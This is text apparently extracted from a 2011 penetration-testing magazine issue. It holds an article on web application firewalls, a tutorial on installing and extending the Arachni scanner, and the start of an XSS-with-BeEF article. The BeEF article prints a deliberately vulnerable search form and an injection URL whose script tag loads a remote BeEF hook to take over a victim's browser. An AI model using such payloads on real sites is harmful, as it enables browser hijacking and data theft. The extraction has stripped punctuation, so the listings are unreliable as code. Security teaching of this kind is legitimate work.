A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
talks to one or more dispatchers that will perform the scanning job New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid)
This is great if you want to speed up the scan or if you want to execute some crazy things like running
We can vouch that both simplicity and performance goals have been attained by Arachni Since the framework is still under heavy development stability is sometimes lacking but at no time this interfered with our vulnerability assessments
Arachni is highly modular both from an architecture point of view as a source code point of view The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan The connection to these dispatchers can be secured by SSL encryption and cert based authentication One dispatcher can handle multiple clients Multiple dispatchers can share a load and communicate with each other to optimise and speed-up the scanning process
The asynchronous scanning engine supports both HTTP and HTTPS and has pauseresume functionality Arachni supports upstream proxies (for SOCKS4 SOCKS4A SOCKS5 HTTP11 and HTTP10) as well as proxy authentication
The scanner can authenticate versus the web application using form-based authentication HTTP Basic and Digest Authentication and NTLM
At the start of every scan a crawler will try to detect all pages In version 03 this was optional but since version 04 the crawler will always be run at the start of the scan This crawler has filters for redundant pages based on regular expressions and counters and can include or exclude URLs based on regular expressions Optionally the crawler can also follow subdomains There is also an adjustable link count and redirect limit
The HTML parser can extract forms links cookies and headers It can graciously handle badly written HTML due to a combination of regular expression analysis and the Nokogiri HTML parser
Arachni offers a very simple and easy to use module API enabling a developer to access helper audit methods and writing custom modules in a matter of minutes Arachni already includes a large number of modules audit modules and reconnaissance (recon) modules Table 1 provides an overview
Arachni offers report management The following reports can be created standard output HTML XML TXT YAML serialization and the Metareport providing Metasploit integration for automated and assisted exploitation
Arachni has many build-in plug-ins that have direct access to the framework instance Plug-ins can be used to add any functionality to Arachni Table 2 provides an overview of currently available plug-ins
InstallationArachni consists of client-side (web or shell) and server-side functionality (the dispatchers) A client
Table 2 Included Arachni plug-ins Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni
Plug-insPassive Proxy Analyses requests and responses
between the web application and the browser assisting in AJAX audits logging-in andor restricting the scope of the audit
Form based AutoLogin Performs an automated login
Dictionary attacker Performs dictionary attacks against HTTP Authentication and Forms based authentication
Proler Performs taint analysis with benign inputs and response time analysis
Cookie collector Keeps track of cookies while establishing a timeline of the changes
Healthmap Generates a sitemap showing the health (vulnerability present or not) of each crawledaudited URL
Content-types Logs content-types of server responses aiding in the identication of interesting (possibly leaked) les
WAF (Web Application Firewall) Detector
Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
Metamodules Loads and runs high-level meta-analysis modules premidpost-scanAutoThrottle Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilizationTimeoutNotice Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with It also points out the danger of DOS (Denail-of-Service) attacks against pages that perform heavy-duty processingUniformity Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers
Letrsquos get our hands dirty and start with the experimental branch (currently at version 04) so we can work with the latest and greatest functionality Another benefit is that this experimental version can work under Windows
Installation under Linux is quick and easy but a Windows set-up requires the installation of Cygwin first Cygwin is a collection of tools that provide a Linux-like environment on Windows as well as providing a large part of Linux APIs Another possibility is to run it natively in Windows using MinGW (Minimalistic GNU for Windows) but at this moment there are too many problems involved with that
LinuxInstallation under Linux is quite straightforward Open your favourite shell and execute the following commands Listing 1
This will install all source directories in your home directory Change all the cd commands if you want the sources somewhere else In case you need an update to the latest versions just cd into the three directories above and perform
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni If you encounter a Typhoeus related error while running Arachni issue
$ gem clean
WindowsArachni comes with decent documentation but I had a chuckle when I read the installation instructions for Windows Windows users should run Arachni in Cygwin I knew that this was not going to be a smooth ride Since v03 some changes have been made to the experimental version to make it easier so here we go
Please note that these installation instructions start with the installation of Cygwin and all required dependencies
Install or upgrade Cygwin by running setupexe Apart from the standard packages include the following
bull Database libsqlite3-devel libsql3_0bull Devel doxygen libffi4 gcc4 gcc4-core gcc4-g++
git libxml2 libxml2-devel make openssl-develbull Editors nanobull Libs libxslt libxslt-devel libopenssl098 tcltk
libxml2 libmpfr4bull Net libcurl-devel libcurl4
Listing 1 Installation for Linux
$ sudo apt-get install libxml2-dev libxslt1-dev
libcurl4-openssl-dev libsqlite3-
dev
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ $ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2 Installation for Windows
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
Accept the installation of packages that are required to satisfy dependencies Note that some of your other tools might not work with these libraries or upgrades In any case an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand First we need to install libffi Execute the following commands in your Cygwin shell
$ cd
$ git clone httpgithubcomatgreenlibffigit
$ cd libffi
$ configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml Download the latest stable version of libyaml (currently 014) from http httppyyamlorgwikiLibYAML and move it to your Cygwin home folder (probably Ccygwinhomeyour _ windows _ id) Execute the following
$ cd
$ tar xvf yaml-014targz
$ cd yaml-014
$ configure
$ make
$ make install
Now we need to compile and install Ruby Download the latest stable release of Ruby (currently ruby-192-p290targz) from http httpwwwrubyorg and move it to your Cygwin home folder Execute the following commands in the Cygwin shell
$ cd
$ tar xvf ruby-192-p290targz
$ cd ruby-192-p290
$ configure
$ make
$ make install
From your Cygwin shell update and install some necessary modules
$ gem update ndashsystem
$ gem install rake-compiler
$ cd
$ git clone httpgithubcomdjberg96sys-proctablegit
$ cd sys-proctable
$ gem build sys-proctablegemspec
$ gem install sys-proctable-091-x86-cygwingem
Finally we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note these are the same commands as with the Linux installation) Listing 2
In case of weird error-messages (especially on Vista systems) regarding fork during compilation execute the following in your Cygwin shell
$ find usrlocal -iname lsquosorsquo gt tmplocalsolst
Quit all Cygwin shells Use Windows to browse to Ccygwinbin Right click ashexe and choose run as administrator Enter in ash
$ binrebaseall
$ binrebaseall -T tmplocalsolst
Exit ash
Light my FireHow to fire up Arachni depends on whether you want to use it with the new (since version 03) web GUI or simply run everything through the command-line interface Note that the current web GUI does not support all functionality that is available from the command-line
The GUI can be started by executing the following commands
$ arachni_rpcd amp
$ arachni_web
After that browse to httplocalhost4567 and admire the new GUI You will need to attach the GUI to one or more dispatchers The dispatcher(s) will run the actual scan
Figure 1 Edit Dispatchers
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1)
bull Start a Scan start a scan by entering the URL and pressing Launch scan After a scan is launched the screen gives an overview of what issues are detected and how far the process is
bull Modules enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site-Scripting (XSS) SQL Injection (SQLi) Cross-Site-Request Forgery (CSRF) or detect hidden features or simply make lists of interesting items such as email addresses
bull Plugins plug-ins help to automate tasks Plug-ins are more powerful than modules and enable to script login sequences detect Web Application Firewalls (WAF) perform dictionary attacks hellip
bull Settings the settings screens allows to add cookies and headers limit the scan to certain directories hellip
bull Reports gives access to the scan reports Arachni creates reports in its own internal format and exports them to HTML XML or text
bull Add-ons three add-ons are installedbull Auto-deploy converts any SSH enabled Linux
box in an Arachni dispatcherbull Tutorial serves as an examplebull Scheduler schedules and run scan jobs at a
specific timebull Log overview of actions taken by the GUI
Your First ScanWe will use both the command-line and the GUI First the command-line start a scan with all modules active This is extremely easy
$ arachni httpwwwexamplecom --report =afroutfile=
wwwexamplecomafr
Afterwards the HTML report can be created by executing the following
$ arachni --repload=wwwexamplecomafr --report=html
outfile=wwwexamplecomhtml
Thatrsquos it Enabling or disabling modules is of course possible Execute the following command for more information about the possibilities of the command-line interface
$ arachni --help
Usually it is not necessary to include all recon modules Some modules will create a lot of requests making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish List all modules with the following command
$ arachni --lsmod
Enabling or disabling modules is easy use the --mods switch followed by a regular expression to include modules or exclude modules by prefixing the regular expression with a dash Example
$ arachni --mods= -xss_ httpwwwexamplecom
The above will load all modules except the module related with Cross-Site-Scripting (XSS)
Using the GUI makes this process even easier Open the GUI by browsing to httplocalhost4567 and accept the default dispatcher
Next steps are to verify the settings in the Settings Modules and Plugins screens Once you are satisfied proceed to the Start a Scan screen
If you want to run a scan against some test applications visit my blog for the list of deliberately vulnerable applications Most of these applications can be installed locally or can be attacked online (please read all related faqs and permissions before scanning a site In most jurisdictions this is illegal unless permission is explicitly granted by the owner)
After the scan just go the Reports screen and download the report in the format you wantFigure 2 Start a scan screen
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
Listing 3 Create your own module
=begin
Arachni
Copyright (c) 2010-2011 Tasos Zapotek Laskos
tasoslaskosgmailcom
This is free software you can copy and distribute
and modify
this program under the term of the GPL v20 License
(See LICENSE file for details)
=end
module Arachni
module Modules
Looks for common files on the server based on
wordlists generated from open
source repositories
More information about the SVNDigger wordlists
httpwwwmavitunasecuritycomblogsvn-digger-
better-lists-for-forced-browsing
The SVNDigger word lists were released under the GPL
v30 License
author Herman Stevens
see httpcwemitreorgdatadefinitions538html
class SvnDiggerDirs lt ArachniModuleBase
def initialize( page )
super( page )
end
def prepare
to keep track of the requests and not repeat them
__audited ||= Setnew
__directories ||=[]
return if __directoriesempty
read_file( all-dirstxt )
|file|
__directories ltlt file unless fileinclude( )
end
def run( )
path = get_path( pageurl )
return if __auditedinclude( path )
print_status( Scanning SVNDigger Dirs )
__directorieseach
|dirname|
url = path + dirname +
print_status( Checking for url )
log_remote_directory_if_exists( url )
|res|
print_ok( Found dirname at +
reseffective_url )
__audited ltlt path
def selfinfo
name =gt SVNDigger Dirs
description =gt qFinds directories
based on wordlists created from
open source repositories The
wordlist utilized by this module
will be vast and will add a consi
derable amount of
time to the overall scan time
author =gt Herman Stevens ltherman
stevensgmailcomgt
version =gt 01
references =gt
Mavituna Security =gt
httpwwwmavitunasecuritycom
blogsvn-digger-better-lists-for-
forced-browsing
OWASP Testing Guide =gt
httpswwwowasporgindexphp
Testing_for_Old_Backup_and_
Unreferenced_Files_(OWASP-CM-006)
targets =gt Generic =gt all
issue =gt
name =gt qA SVNDigger
directory was detected
description =gt q
tags =gt [ svndigger path
directory discovery ]
cwe =gt 538
severity =gt IssueSeverityINFORMATIONAL
cvssv2 =gt
remedy_guidance =gt Review these
resources manually Check if
unauthorized interfaces are exposed
or confidential information
remedy_code =gt
end
end
end
end
WEB APP VULNERABILITIES
Page 28 httppentestmagcom012011 (1) November
Create your Own ModuleArachni is very modular and can be easily extended In the following example we create a new reconnaissance module
Move into your Arachni source tree Yoursquoll find the modules directory In there yoursquoll find two directories audit and recon Move into the recon directory We will create our Ruby module
Arachni makes it real easy if your module needs external files it will search into a subdirectory with the same name Example if you create a svn_digger_dirsrb module this module is able to find external files in the modulesreconsvn_digger_dirs subdirectory
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing These wordlists are based on directories found in open source code repositories
If there is a directory that needed to be protected and you forget that it will be found by a scanner that uses these wordlists
Furthermore it can be used as a basis for reconnaissance if a directory or file is detected this might provide clues about what technology the site is using
Download the wordlists from the above URL Create a directory modulesreconsvn_digger_dirs and move the file all-dirstxt from the wordlist archive to the newly created directory
Create a copy of the file modulesreconcommon_
directoriesrb and name it svn_digger_dirsrb Change the code to read as follows Listing 3
The code does not need a lot of explanation it will check whether or not a specific directory exists if yes it will forward the name to the Arachni Trainer (who will include the directory in the further scans) as well as create a report entry for it
Note the above code as well as another module based on the SVNDigger wordlists with filenames are now part of the experimental Arachni code base
ConclusionWe used Arachni in many of our application vulnerability assessments The good points are
bull Highly scalable architecture just create more servers with dispatchers and share the load This makes the scanner a lot more responsive and fast
bull Highly extensible create your own modules plug-ins and even reports with ease
bull User-friendly start your scan in minutesbull Very good XSS and SQLi detection with very few
false positives There are false negatives but this
is usually caused by Arachni not detecting the links to be audited This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy
bull Excellent reporting capabilities with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE)
Arachni lacks support for the following
bull No AJAX and JSON supportbull No JavaScript support
This means that you need to help Arachni finding links hidden in JavaScript eg by using it as a proxy between your browser and the web application Yoursquoll need a different tool (or use your brain and manual tests) to check for AJAXJSON related vulnerabilities in the application you are testing
Arachni also cannot examine and decompile Flash components but a lot of tools are at hand to help you with that Arachni does not perform WAF (Web Application Firewall) evasion but then again this is not necessarily difficult to do manually for a skilled consultant or hacker
And why not write your own module or plug-in that implements the missing functionality Arachni is certainly a tool worth adding to your toolkit
HERMAN STEVENSAfter a career of 15 years spanning many roles (developer security product trainer information security consultant Payment Card Industry auditor application security consultant) Herman Stevens now works and lives in Singapore where he is the director of his company Astyran Pte Ltd (httpwwwastyrancom) Astyran specialises in application security such as penetration tests vulnerability assessments secure code reviews awareness training and security in the SDLC Contact Herman through email (hermanstevensgmailcom) or visit his blog (httpblogastyransg)
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
In most commercial penetration testing reports itrsquos sufficient to just show a small alert popup this is to show that a particular parameter is vulnerable to
an XSS attack However this is not how an attacker would function in the real world Sure hersquod use a pop up initially to find out which parameter is vulnerable to an XSS attack Once hersquos identified that though hersquoll look to steal information by executing malicious JavaScript or even gain total control of the userrsquos machine
In this article wersquoll look at how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using Beef (A browser exploitation framework)
A Simple POCTo start off though letrsquos do exactly what the attacker would do which is to identify a vulnerability For simplicityrsquos
sake wersquoll assume that the attacker has already identified a vulnerable parameter on a page Here are the relevant files which you too can use on your web server if you want to try this also
HTML Page
ltHTMLgt
ltBODYgt
ltFORM NAME=rdquotestrdquo action=rdquosearch1phprdquo method=rdquoGETrdquogt
Search ltINPUT TYPE=rdquotextrdquo name=rdquosearchrdquogtltINPUTgt
ltINPUT TYPE=rdquosubmitrdquo name=rdquoSubmitrdquo value=SubmitgtltINPUTgt
ltFORMgt
ltBODYgt
ltHTMLgt
XSS Beef Metaspoilt Exploitation
Figure 2 BeeF after conguration
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code
Figure 1 User enters in a search box
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
httplocalhostsearch1phpsearch=ltscript src=
rsquohttp19216856101beefhookbeefmagicjsphprsquogt
ltscriptgtampSubmit=Submit
The IP address here is the one on which you have BeeF running Once the user clicks on the link above you should see an entry in the BeeF controller window showing that a Zombie has connected You can see this in the Log section on the right hand side or the Zombie section on the left hand side Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3)
